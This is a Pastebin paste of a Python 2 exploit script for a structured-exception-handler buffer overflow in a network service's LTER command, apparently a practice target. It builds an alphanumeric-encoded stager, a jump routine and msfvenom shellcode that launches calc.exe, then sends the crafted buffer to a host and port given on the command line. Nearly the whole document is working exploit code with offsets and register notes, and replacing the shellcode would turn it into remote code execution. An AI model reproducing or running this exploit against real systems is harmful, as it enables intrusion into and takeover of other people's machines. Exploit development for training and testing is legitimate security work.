Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import socket
- from struct import pack
- import sys
- host = sys.argv[1]
- port = int(sys.argv[2])
- seh = pack("<I", 0x6250172B)
- nseh = "\x43\x43\x75\xff"
- # End of D's BEFFFF
- # Beginning of A's BEF230
- # First aligned A at BEF239
- # A's offset: DBF (-3519 bytes)
- # ESP offset from D's: 11AF (-4527 bytes)
- stager = "\x54\x58" # push esp, pop eax
- stager += "\x66\x05\x7f\x11" # add ax, 0x1170 | 4464 bytes
- stager += "\x50\x5c" # push eax, pop esp
- """
- jmp2buff asm
- nasm > mov ebx, esp
- 00000000 89E3 mov ebx,esp
- nasm > sub bx, 0xdba
- 00000000 6681EBBA0D sub bx,0xdba
- nasm > sub bx, 0xd8a
- 00000000 6681EB8A0D sub bx,0xd8a
- nasm > push ebx
- 00000000 53 push ebx
- nasm > pop esp
- 00000000 5C pop esp
- nasm > call esp
- 00000000 FFD4 call esp
- """
- jmp2buff = ""
- jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
- jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
- jmp2buff += "\x05\x36\x77\x63\x41" ## add eax, 0x41637736
- jmp2buff += "\x05\x35\x66\x62\x41" ## add eax, 0x41626635
- jmp2buff += "\x05\x24\x55\x42\x41" ## add eax, 0x41425524
- jmp2buff += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
- jmp2buff += "\x50" ## push eax
- jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
- jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
- jmp2buff += "\x05\x76\x45\x07\x32" ## add eax, 0x32074576
- jmp2buff += "\x05\x75\x45\x06\x21" ## add eax, 0x21064575
- jmp2buff += "\x50" ## push eax
- jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
- jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
- jmp2buff += "\x05\x45\x72\x33\x41" ## add eax, 0x41337245
- jmp2buff += "\x05\x44\x71\x33\x40" ## add eax, 0x40337144
- jmp2buff += "\x50" ## push eax
- # msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -b '\x00' -e x86/alpha_mixed BufferRegister=ESP -f c
- # shellcode gets loaded into ESP, then called, and ends up dying 3/4 of the way through in a recursive SEH chain
- shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
- "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
- "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
- "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6d\x38\x4d\x52\x57\x70"
- "\x75\x50\x35\x50\x71\x70\x6e\x69\x4a\x45\x75\x61\x49\x50\x62"
- "\x44\x4e\x6b\x66\x30\x74\x70\x4c\x4b\x43\x62\x34\x4c\x6e\x6b"
- "\x36\x32\x47\x64\x4e\x6b\x54\x32\x76\x48\x54\x4f\x4c\x77\x43"
- "\x7a\x77\x56\x45\x61\x6b\x4f\x6c\x6c\x45\x6c\x70\x61\x43\x4c"
- "\x45\x52\x56\x4c\x75\x70\x39\x51\x78\x4f\x54\x4d\x65\x51\x49"
- "\x57\x68\x62\x78\x72\x36\x32\x71\x47\x4c\x4b\x52\x72\x72\x30"
- "\x4e\x6b\x42\x6a\x45\x6c\x6e\x6b\x70\x4c\x52\x31\x43\x48\x6a"
- "\x43\x67\x38\x55\x51\x78\x51\x52\x71\x6e\x6b\x36\x39\x65\x70"
- "\x47\x71\x79\x43\x4e\x6b\x43\x79\x72\x38\x49\x73\x37\x4a\x77"
- "\x39\x4e\x6b\x30\x34\x6c\x4b\x75\x51\x79\x46\x46\x51\x59\x6f"
- "\x4c\x6c\x69\x51\x4a\x6f\x66\x6d\x33\x31\x6b\x77\x46\x58\x4d"
- "\x30\x34\x35\x4c\x36\x33\x33\x31\x6d\x6c\x38\x45\x6b\x61\x6d"
- "\x54\x64\x42\x55\x69\x74\x70\x58\x4e\x6b\x73\x68\x55\x74\x36"
- "\x61\x7a\x73\x35\x36\x4c\x4b\x64\x4c\x50\x4b\x4e\x6b\x50\x58"
- "\x47\x6c\x67\x71\x5a\x73\x6c\x4b\x66\x64\x6c\x4b\x47\x71\x6a"
- "\x70\x4e\x69\x53\x74\x65\x74\x57\x54\x43\x6b\x31\x4b\x63\x51"
- "\x50\x59\x73\x6a\x53\x61\x79\x6f\x49\x70\x71\x4f\x61\x4f\x50"
- "\x5a\x6e\x6b\x46\x72\x78\x6b\x6e\x6d\x73\x6d\x51\x7a\x46\x61"
- "\x6c\x4d\x4f\x75\x4e\x52\x77\x70\x67\x70\x65\x50\x42\x70\x50"
- "\x68\x36\x51\x6e\x6b\x70\x6f\x6b\x37\x69\x6f\x48\x55\x6f\x4b"
- "\x49\x70\x37\x6d\x54\x6a\x34\x4a\x31\x78\x4d\x76\x4a\x35\x4f"
- "\x4d\x4d\x4d\x59\x6f\x6b\x65\x65\x6c\x34\x46\x43\x4c\x75\x5a"
- "\x4f\x70\x49\x6b\x6b\x50\x33\x45\x63\x35\x6f\x4b\x62\x67\x47"
- "\x63\x44\x32\x30\x6f\x62\x4a\x67\x70\x51\x43\x79\x6f\x78\x55"
- "\x71\x73\x61\x71\x30\x6c\x52\x43\x34\x6e\x42\x45\x54\x38\x73"
- "\x55\x63\x30\x41\x41")
- # Overflowed with lter.spk "LTER /.:/(3520 A's)"
- # NSEH overwritten at 3495
- # SEH overwritten at 3499
- buffer = "LTER /.:/"
- buffer += "A"*4
- buffer += shellcode
- buffer += "A"*2927
- buffer += stager
- buffer += jmp2buff
- buffer += "A"*43
- buffer += nseh
- buffer += seh
- buffer += "D"*(1000-len(nseh)-len(seh))
- try:
- print "[+] Connecting to target"
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host, port))
- s.recv(1024)
- print "[+] Sent payload with length: %d" % len(buffer)
- s.send(buffer)
- s.close()
- except:
- print "[-] Something went wrong :("
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement